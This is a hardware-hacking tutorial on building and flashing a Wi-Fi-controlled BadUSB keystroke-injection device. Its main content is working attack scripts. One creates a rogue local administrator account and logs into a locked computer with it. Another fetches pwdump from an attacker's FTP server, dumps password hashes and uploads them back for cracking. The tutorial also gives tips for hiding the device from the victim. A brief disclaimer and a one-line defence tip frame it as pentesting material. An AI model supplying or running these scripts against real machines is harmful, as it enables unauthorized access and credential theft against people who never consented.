How to Build and Program a Remote-Controlled Wi-Fi BadUSB (Wi-Fi Ducky)

By Sydney ColeHardware Hacking

Remote-Controlled Evil Duck: Building and Programming a Wi-Fi BadUSB

You’ve probably heard stories about hackers using USB devices that look like regular flash drives to carry out attacks. All it takes is plugging such a device into a server to gain remote control. This is reminiscent of the infamous Rubber Ducky prototype. However, the classic “evil duck” is a one-time tool: it runs a single script with pre-set actions. Today, we’ll build a much more versatile version.

Disclaimer: This article is intended for white-hat hackers, professional pentesters, and CISOs. Neither the author nor the editors are responsible for any harm caused by the use of this material.

Beyond the Rubber Ducky

You’ve likely heard of the Rubber Ducky—a BadUSB device used for HID attacks. These devices emulate a keyboard, allowing them to send any commands as if typed by the user. They contain a simple microcontroller and memory where a sketch (Arduino code) is stored, defining the emulation and actions to perform—usually a sequence of keystrokes.

The main danger of this attack method is its stealth and speed. However, there are drawbacks:

  • You need to know the full configuration of the target computer.
  • You must test the attack on a similar system and adjust delays as needed. If a single keystroke is mistimed, the attack fails.
  • You can only use one script at a time. You can’t add functions on the fly or interrupt and restart actions.

We’ll build a device that overcomes these limitations.

Building the Wi-Fi Ducky

This is essentially a Rubber Ducky with a Wi-Fi module. When plugged in, the script doesn’t run immediately (though you can enable this). Instead, it creates a Wi-Fi access point, waiting for you to connect from your phone or laptop and trigger actions at your convenience.

You could use an Arduino MKR1000 with an Atmel ATSAMW25 Wi-Fi module and the WiFi101 library (about $35), or a ready-made Cactus WHID ($14), but both have limitations. Instead, we’ll build a cheaper (under $10) and more functional device called the Wi-Fi Ducky, created by Stefan Kremser (“Kosmoplovci”). The hardware is available as DIY modules on AliExpress, with code on GitHub, but we’ll take a slightly different approach.

You’ll need two devices:

  • Arduino Pro Micro
  • WeMos D1 mini with an ESP-8266EX microcontroller and 802.11b/g/n Wi-Fi

We’ll connect them, but first, let’s flash the firmware.

Flashing the Arduino Pro Micro

  1. Download and install the Arduino IDE. This also installs all necessary drivers.
  2. Connect the Arduino Pro Micro to your computer using an OTG adapter or appropriate cable (it uses mini-USB).
  3. In the Arduino IDE, select Arduino/Genuino Micro under Tools > Board, and select the correct COM port.
  4. Get the sketch from the project page. The sketch converts STRING commands into Arduino syntax (Keyboard.print(“”)) and activates the required pins.
  5. Copy and paste the sketch into the Arduino IDE, click “Upload,” and wait for confirmation. The controller will now activate TX, RX, GND, and RAM pins and wait for commands.

Flashing the WeMos D1 mini

  1. Switch from micro-USB to USB Type-A for connection.
  2. When first connected, Windows may not recognize the device. Download the CH341 driver from the official site, extract, and install it as administrator. The device should appear as USB-SERIAL CH340 in Device Manager.
  3. Download the NodeMCU firmware programmer from GitHub (choose the version for your OS).
  4. Download the firmware (e.g., esp8266_wifi_duck_4mb.bin).
  5. Open the firmware programmer, select the correct COM port, go to the Config tab, click the gear icon, and select the firmware file (address: 0x00000). In the Advanced tab, set Baudrate to 115200. Click “Flash” in the Operation tab and wait for the process to complete.

Soldering the Boards

Once both boards are flashed, connect them as follows:

Arduino <–> WeMos
TX <–> RX
RX <–> TX
GND <–> GND
RAM <–> 5U

It’s best to test the setup on a breadboard before soldering. Connect the Arduino Pro Micro to your computer and test functionality. If it works, solder the connections. There are no tiny parts, so even beginners can handle it.

Here’s what the assembled device should look like:

Assembled Wi-Fi Ducky Example

Testing and Features

After soldering, check that both boards still work. Connect the Arduino Pro Micro to your computer and wait for the HID driver to install. The Arduino should show two red and one green LED.

From your phone, tablet, or laptop, look for a new Wi-Fi access point named WiFi Duck. If you see it, everything is working. Connect to it (default password: quackquack—you can change this later). Open a browser and go to 192.168.4.1 to access the device’s control panel.

The web interface is simple, with four tabs:

  • Scripts: Manage and upload scripts in .ino or .txt format. You can write your own or find ready-made ones online. There’s plenty of memory—almost 3 MB.
  • Live Execute: Write and run scripts instantly or save them for later. The scripting language is different from standard Arduino, but instructions are provided below the input field.
  • Settings: Change the access point name, password, hide the network, or set a script to run automatically when the device is plugged in.
  • Info: Project links, SDK, web server, script interpreter, and firmware update options.

Writing Attack Scripts

Your cyber weapon is ready—now load it with scripts. Pay attention to DELAY commands to ensure the code doesn’t run before the target system is ready. Use longer delays if the victim’s system is slower than your test machine (e.g., no SSD, less RAM, slower CPU).

Example: Wi-Fi Ducky is plugged into the target, and you’re nearby. There’s an active user account with local admin rights. Here’s a script to create a new user and add it to the Administrators group:

GUI r
STRING cmd
ENTER
DELAY 100
STRING net user hacker qwerty /add
DELAY 200
STRING net localgroup administrators hacker /add
ALT KEY_F4

If run as a standard user, you’ll get “System error 5. Access denied.” As admin, it completes in under half a second and closes the console window.

For Russian Windows, use the group name in Russian: net localgroup Администраторы hacker /add. See the article “How to Make BadUSB Work with Different Keyboard Layouts” for more details.

Next, wait for the user to lock the computer and leave (e.g., for lunch). Run this script to unlock the computer with your new account:

TAB
DELAY 30
TAB 
DELAY 30
ENTER
TAB
DELAY 30
TAB
DELAY 30
ENTER

Voilà! You’re now using the victim’s computer with your new account (assuming only two accounts exist).

To download pwdump from a prepared FTP server:

GUI r
DELAY 30
STRING cmd
ENTER
DELAY 30
STRING echo open > ftp.txt & echo ip-ftp >> ftp.txt & echo user >> ftp.txt & echo password >> ftp.txt & echo get pwdump.exe >> ftp.txt & echo bye >> ftp.txt
ENTER
DELAY 50
STRING ftp –s:ftp.txt
DELAY 3000

Then dump password hashes:

STRING pwdump.exe >> pass.txt

And upload the file back to the server:

STRING echo open > ftp1.txt & echo ip-ftp >> ftp1.txt & echo user >> ftp1.txt & echo password >> ftp1.txt & echo send pass.txt >> ftp1.txt & echo bye >> ftp1.txt
DELAY 50
STRING ftp –s:ftp1.txt

Use rainbow tables to crack the hashes and gain more accounts for further attacks. The device remains in the computer, and you can do anything within Wi-Fi range.

Improvements and Customization

This is already a solid hacker device, but there’s always room for improvement:

  • To avoid drawing attention, replace or cover the LEDs with jumpers or nail polish.
  • Enclose the boards in a case to avoid suspicion from exposed wires.
  • If you can open the target’s case, use a cable to connect directly to the motherboard, making detection less likely.
  • If the device is inside the case, use the D1 mini Pro V1.1.0, which supports an external antenna for greater range.

Conclusion

We’ve built an advanced version of the Rubber Ducky—the Wi-Fi Ducky. It’s a dangerous device the size of a matchbox, and building it is affordable and straightforward thanks to ready-made Arduino boards and sketches. While prototyping is done with dev boards, you can later design a custom PCB with the same microcontroller and Wi-Fi module, omitting unnecessary parts. Manufacturing can be ordered from various services for as little as $5.

You can store scripts in the Wi-Fi Ducky’s memory and execute them anytime on any OS—there’s enough space for thousands of lines of code. Remote control makes it far more versatile than local BadUSB devices, letting you do anything on a remote computer as if you were sitting at its keyboard.

To defend against such devices, block new HID devices via OS settings or endpoint security solutions (Kaspersky, HEAT Software, etc.), just as you would with a regular Rubber Ducky.

Leave a Reply